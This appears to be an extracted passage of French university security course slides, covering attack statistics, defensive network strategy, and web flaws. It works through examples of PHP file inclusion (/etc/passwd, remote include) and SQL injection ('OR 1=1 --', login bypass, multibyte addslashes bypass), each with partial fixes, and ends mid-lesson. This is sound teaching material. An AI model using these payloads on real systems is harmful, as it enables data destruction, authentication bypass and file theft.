Page 66: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Attaques : quelques statistiques à l’UT1

Ces chiffres sont des moyennes en 2017200 tests par seconde ( 17 000 000 par jour )1200 scans par jour ( >3 ports ou 10 machines)16 à 2000 machines à chaque fois5 à 10 campagnes de phishing par jour.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 66 / 187

Page 67: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Attaques : incidents à l’UT1

67 incidents de sécurité depuis 13 ans dont16 incidents de phishing49 virus (sortants ou crypto) sur des postes2 intrusions automatiques (vers) sur des serveurs1 boite noire piratée (ShellShock)2 "DDoS" réussis en Février 2015.

Année Total Virus Phishing Autres Commentaires2017 8 3 4 1 Parasitisme avancé2016 12 6 1 5 3 DoS, 2 extorsions2015 16 8 4 4 2 DoS2014 17 8 4 52013 10 6 4 0

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 67 / 187

Page 68: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Attaques : nombre mensuel de tests

lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun.

1 k

2 k

Infractions sur 1 mois

RRDTOOL / TOBI OETIKER

Infractions sortantes par seconde Infractions entrantes par seconde

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 68 / 187

Page 69: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Attaques : nombre d’attaquants

lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. 0

10 k

20 k

Quarantaine sur 1 mois

RRDTOOL / TOBI OETIKER

Quarantaine en sortie par heure Quarantaine en entree par heure

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 69 / 187

Page 70: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Attaques : raisons de la quarantaine sur une journée

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 70 / 187

Page 71: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Pourquoi les services sont vulnérables ?

Mauvaise conception (volontaire ou non)Peace and Love : REXECBackdoor : FSP,EGGDropIncompétence : WEPComplexité : OpenSSL, Bash, WPA2

Mauvaise configurationpostfix, DNS, HTTP

Mauvaise utilisationScripts php, cgi-bin incorrects

Mauvais utilisateursClickophileManque d’intelligence entre la chaise et le clavier

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 71 / 187

Page 72: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Heureusement

C’est super dur de trouver des failles

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 72 / 187

Page 73: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Site de recensement de failles

source http: // www. cvedetails. com

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 73 / 187

Page 74: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Heureusement

C’est super dur de trouver comment exploiter des failles

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 74 / 187

Page 75: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Site d’utilisation de failles

source http: // www. exploit-db. com

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 75 / 187

Page 76: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Heureusement

Les antivirus nous protègent.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 76 / 187

Page 77: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les antivirus

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 77 / 187

Page 78: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Heureusement

Les grosses entreprises ne se font jamais pirater.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 78 / 187

Page 79: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les plus grosses fuites de données

source http: // www. informationisbeautiful. net

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 79 / 187

Page 80: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les plus grosses fuites de données

sourcehttps: // www. csoonline. com/

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 80 / 187

Page 81: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Heureusement

On peut repérer les pirates quand ils cherchent des failles.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 81 / 187

Page 82: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Shodan, Censys, Zoomeye etc.

http://www.shodan.iohttps://censys.iohttps://www.zoomeye.org

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 82 / 187

Page 83: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Résolution des problèmes

La tronçonneuseLe ciseau à boisLe papier de verreLa lazure

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 83 / 187

Page 84: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

La tronçonneuse

On enlève l’inutile :Protection contre l’extérieur;Protection contre l’intérieur;Protection à l’intérieur.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 84 / 187

Page 85: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Protection contre l’extérieur

Travail effectué par le firewall :On bloque tout ce qui vient de l’extérieur;Hormis ce qui est spécifiquement autorisé;Le tout basé sur une notion de port;Les entrées sont limitées en rapidité;On jette et on n’avertit pas.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 85 / 187

Page 86: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Protection contre l’intérieur

Tout est autorisé en sortie SAUFCe qui est offert en interne

DNS, SMTP, NTP, etc.Ce qui est dangereux pour l’extérieur

SNMP, Netbios, etc.Ce qui est illégal, non productif

P2P, pédopornographieJeux en ligne, pornographie

Les "zones ouvertes" qui doivent être contrôléesShow RoomWiFi

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 86 / 187

Page 87: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Protection à l’intérieur

Travail effectué par un filtrage interne. Tout est autorisé enintra-établissement SAUF

Ce qui est dangereuxLes zones ouvertesLes zones fragiles doivent être injoignables

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 87 / 187

Page 88: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Le ciseau à bois

On enlève ce que l’on sait dangereux dans ce qui est autoriséLe courrier électroniqueLe WebLes services en général

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 88 / 187

Page 89: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Le courrier électronique

Le SMTP rentre maisIl ne rentre pas pour ressortirIl ne doit pas être vecteur de virusIl est analysé contre le spam (ou plutôt contre tout danger).

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 89 / 187

Page 90: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Le Web

Le Web sort maisCertains sites sont interditsLes nids à virus sont inspectésOn journalise ce qui passe

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 90 / 187

Page 91: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les services

Certains services sont offerts, maisLes serveurs sont patchésIls remontent les anomaliesUn détecteur d’anomalies veilleOn limite les conséquences des anomalies

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 91 / 187

Page 92: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Le reste

Le reste sort maisLimitation des débitsOn suit les connexions (journaux)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 92 / 187

Page 93: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Le papier de verre

On repère ce qui va être dangereux

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 93 / 187

Page 94: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les logs sont nos amis

Les journaux sont nos seuls amis. On va donc faire appel à euxpour

Les machines internes qui déclenchent des alertes.Les services qui sont auscultés par l’extérieurLes alertes récurrentes

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 94 / 187

Page 95: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les actions de salubrité publique

On abat les webmestres !

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 95 / 187

Page 96: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

La lazure

On évite que le temps et les intempéries ne nous détruisent lamaison.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 96 / 187

Page 97: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

La machine à remonter le temps

On fait des sauvegardesOn vérifie qu’elles fonctionnentOn ne les place pas au même endroit que les serveursOn vérifie qu’elles pourront toujours fonctionner

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 97 / 187

Page 98: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

La dynamo

On met en place la dynamoE.D.F. en temps de paix : 240 VoltsE.D.F. en temps de grève : 0 VoltE.D.F. en temps d’orage : 400 Volts

L’onduleur est votre ami. Vous devez l’écouter.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 98 / 187

Page 99: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

On ferme à clé

Coût d’un pirate professionnel: 2000 e à 200 000 eCoût d’une femme de ménage : 100 e la journée

Moralité : fermez les portes.

Post scriptumTemps moyen pour fracturer une serrure de sécurité "simple" : 3 à30 secondes.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 99 / 187

Page 100: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les actions de salubrité publique

On abat les webmestres !

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 100 / 187

Page 101: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Préservation des webmestres

Directive ministérielle du 17 juillet 2003 Suite à une pression desécologistes, le tir aux webmestres n’est plus autorisé, même endehors des périodes de reproduction.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 101 / 187

Page 102: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Constats

Le web est exposé aux piratesLes erreurs sont faciles à faire, et lourdes de conséquences.

cible directe,vol de données des clients,infection simple des clients,infection ciblée des clients (point d’eau),flashmob DDOS.

Le web est marketingement correct.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 102 / 187

Page 103: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Solutions

Programmer correctementLes variables

Spécialiser la protectionModules spécialisésmod-securityReverse-proxy

Authentifier, chiffrerCertificats / chiffrement

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 103 / 187

Page 104: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les applications web

Les failles d’un site web.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 104 / 187

Page 105: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Problème générique des failles

Les failles sont dues à l’utilisation imprévue d’une variable pourobtenir un comportement inattendu, mais contrôlé, plus ou moinscorrectement, par le pirate.Contrairement à ce que montre le cinéma, les intrusions sont dûes àplus de 90% à l’utilisation de failles de sécurité, et non à unproblème de mot de passe.Les serveurs web étant souvent les seuls points accessibles, voyonscomment cela peut se passer.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 105 / 187

Page 106: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Structure d’un service web

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 106 / 187

Page 107: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

20 points de vulnérabilités

Du schéma précédent, on peut trouver 20 points de vulnérabilités :Les logiciels

Les serveursLes scriptsLes modulesLes outils de protection (antivirus, antispyware, etc.)

Les OSLes matérielsLes communicationsL’utilisateurLes protocoles

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 107 / 187

Page 108: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les types de paramètres

Variables GET. Elles sont données dans l’URL de demande.Variables POST. Fournies par un formulaire.Variables Cookies. Variables conservées par le navigateur surson disque dur et généralement fournies par le serveur.Variables SERVER (HTTP_USER_AGENT ouHTTP_REFERER)

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 108 / 187

Page 109: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les variables GET

Décrites dans l’URL.http://www.google.com/search?p=html&hl=fr.Ici 2 variables p et hl, avec les valeurs html et fr.Généralement provenant d’une interrogation directe.Dans le cas présent, plutôt rare, il s’agit d’envoi par formulaire(method=GET).

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 109 / 187

Page 110: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les variables POST

Remplies par un formulaire.Utilisées quand on a un grand volume de données à envoyer.Utilisées quand on a un grand nombre de variables.Non tracées par les journaux des daemons (hormis modulesspécifiques).Traitement particulier des variables Hidden qui sont cachéespour l’utilisateur, mais pas pour le navigateur.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 110 / 187

Page 111: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les variables cookies

Notion de valise de variables stockées sur le clientTransmises de manière transparente dans la requêteC’est le serveur qui est sensé positionner ces variables pour unedurée limitéeUn serveur ne peut généralement (sauf faille de sécurité)demander à accéder qu’aux variables :

Qu’il a lui-même positionnées.Qu’une machine de son domaine a positionnées (et si celle-cil’a autorisé).

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 111 / 187

Page 112: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

Les variables SERVER

Ces variables sont hétéroclites.Celles que seul le serveur connait

Version du serveurRépertoire de travail

Celles qui sont associées à la connexionL’adresse du client REMOTE_ADDRL’hôte appeléLe port source

Celles qui proviennent du clientLe Referer : HTTP_REFERERLe USER_AGENTL’URL appelée

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 112 / 187

Page 113: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : principe fondamental

Ces variables proviennent en majorité du client.Il a donc tout pouvoir pour les modifier, effacer.Les contrôles Javascript sont exécutés par le client ( s’il lesouhaite ! ).Les contrôles de formulaire (taille, type) sont exécutés par leclient ( s’il le souhaite ! ).

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 113 / 187

Page 114: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Généralisation : Injection de code

Faille de sécurité : faire exécuter du code informatiqueCe code va être injecté par une "interface" pas prévue pourCe code dépend de qui va l’éxecuter et du vecteur d’injection

Nom Langage Vecteur Interpréteur/VictimeBuffer Overflow Assembleur Binaire ProcesseurSQL Injection SQL web SGBDLDAP Injection LDAP web annuaire LDAPInjection shell, DOS, etc. web Interpréteur backofficeXSS Javascript web navigateurCSRF HTML web navigateurscript PDF Javascript PDF lecteur PDF

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 114 / 187

Page 115: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Quelques exemples

Variables sur les noms de fichier (ou les répertoires)Variables dites superglobalesVariables dans les requêtes SQL (ou LDAP ou toutinterpréteur)Variables pour du XSS

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 115 / 187

Page 116: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Sur les noms de fichiers

Exemple d’inclusion.

Soit le programme suivant<?include ("header.inc");$page=$_GET[’page’];include ($page);include ("footer.inc");?>

que l’on utilise de la manière suivante

Utilisationhttp://192.168.30.72/mep.php?page=toto.txt

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 116 / 187

Page 117: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Sur les noms de fichiers

Quelques attaques :

Exemples simples d’utilisation malveillantehttp://192.168.30.72/mep.php?page=/etc/passwdhttp://192.168.30.72/mep.php?page=https://dsi.ut-capitole.fr/creufophacker.inc

On pourrait de la même manière utiliser les fonctions fopen,require, etc.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 117 / 187

Page 118: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV :Solution

Refuser les requêtes avec des caractères dangereux<?If (eregi("/",$page)){die("Va jouer dans le mixer !")}include ("header.inc");include ($page);include ("footer.inc");?>

On doit aussi utiliserLa notion de "allow_url_fopen" et "allow_url_include" duphp.ini en les mettant à faux,La notion de "open_basedir" en listant les répertoires autorisésEmpêcher l’utilisateur apache de sortir (avec un firewall ensortie), on pourra aussi bloquer MySQL et proftpd.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 118 / 187

Page 119: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL (ou LDAP)

Le SQL est un langage d’interrogation de base de données. C’estun véritable langage de programmation, avec ses fonctions, sesvariables, ses commentaires.Le principe des appels SQL en WWW, est que le langage (PHP parexemple) crée une chaine de caractères (la commande SQL) qui estensuite envoyée au SGBD.Le SGBD interprète et exécute le programme envoyé.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 119 / 187

Page 120: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL ou LDAP

Utilisationhttp://192.168.30.72/test_sql.php?id=3;

Code du programme$sql_query="DELETE FROM matable WHERE id=$id";mysql_connect($database);mysql_query($database,$sql_query);

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 120 / 187

Page 121: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL première attaque

Les espaces doivent être remplacés par %20http://192.168.30.72/test_sql.php?id=3 OR 1=1

ce qui nous donne

Chaine envoyée au SGBDDELETE FROM matable WHERE id=3 OR 1=1

Le résultat est la destruction de tous les enregistrements.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 121 / 187

Page 122: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL 1bis

Code du programme<?$sql_query="DELETE FROM matable WHERE id=$id AND champ1=true";mysql_connect($database);mysql_query($database,$sql_query);?>

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 122 / 187

Page 123: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL attaque 1bis

On ajoute un commentairehttp://192.168.30.72/test_sql.php?id=3 OR 1=1 --

ce qui nous donne :

Chaine envoyée au SGBDDELETE FROM matable WHERE id=3 OR 1=1 -- AND champ1=true

Le résultat est la destruction de tous les enregistrements, car la findu WHERE n’est pas prise en compte.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 123 / 187

Page 124: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL attaque 1ter

Un commentaire peut suffirehttp://192.168.30.72/login.php?login=admin --

ce qui nous donne :

Chaine envoyée au SGBDSELECT uid FROM user WHERE login=$login -- AND password=$password

Le résultat est une identification sans mot de passe.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 124 / 187

Page 125: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL première solution

La première solution peut consister à modifier le programme enajoutant des quotes

Code du programme$sql_query="DELETE FROM matable WHERE id=’$id’";

Le résultat de la première attaque devient alors

Code du programmeDELETE FROM matable WHERE id=’3 OR 1=1’

qui est sans danger.Mais pourtant une faille existe encore

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 125 / 187

Page 126: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL deuxième attaque

Insérons une quotehttp://192.168.30.72/test_sql.php?id=3’ OR 1=1 --

ce qui nous donne

Chaine envoyée au SGBDDELETE FROM matable WHERE id=’3’ OR 1=1 -- ’

Le résultat est encore la destruction de tous les enregistrements.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 126 / 187

Page 127: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL deuxième solution

La solution va passer par 2 possibilitésle magic_quotes_gpc à on (ATTENTION : les versions dePHP influent !)la fonction addslashes (idem)

Code du programme$id=add_slashes($id);$sql_query="DELETE FROM matable WHERE id=’$id’";

L’attaque précédente donne alors

Chaine envoyée au SGBDDELETE FROM matable WHERE id=’3\’ OR 1=1’

Qui ne fait plus rien. Mais ce n’est toujours pas fini. Une failleexiste malgré cela.

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 127 / 187

Page 128: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL troisième attaque

Le but de magic_quotes_gpc est à ON. Mais il a des problèmesavec les caractères dits "multibytes" : c’est à dire les alphabets pluscomplexes (chinois par exemple)A la place de la quote, plaçons le caractère multibyte ’0xbf27’ .Cela ne peut réellement se faire que par un script :

Parlons chinois$id=chr(0xbf).chr(0x27)." OR 1=1";fopen(http://192.168.30.72/test_sql.php?id=$id)";

Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Jeudi 15 Février 2018 128 / 187

Page 129: La sécurité informatique RTAI - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_rtai.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu

MUV : Les injections SQL troisième attaque

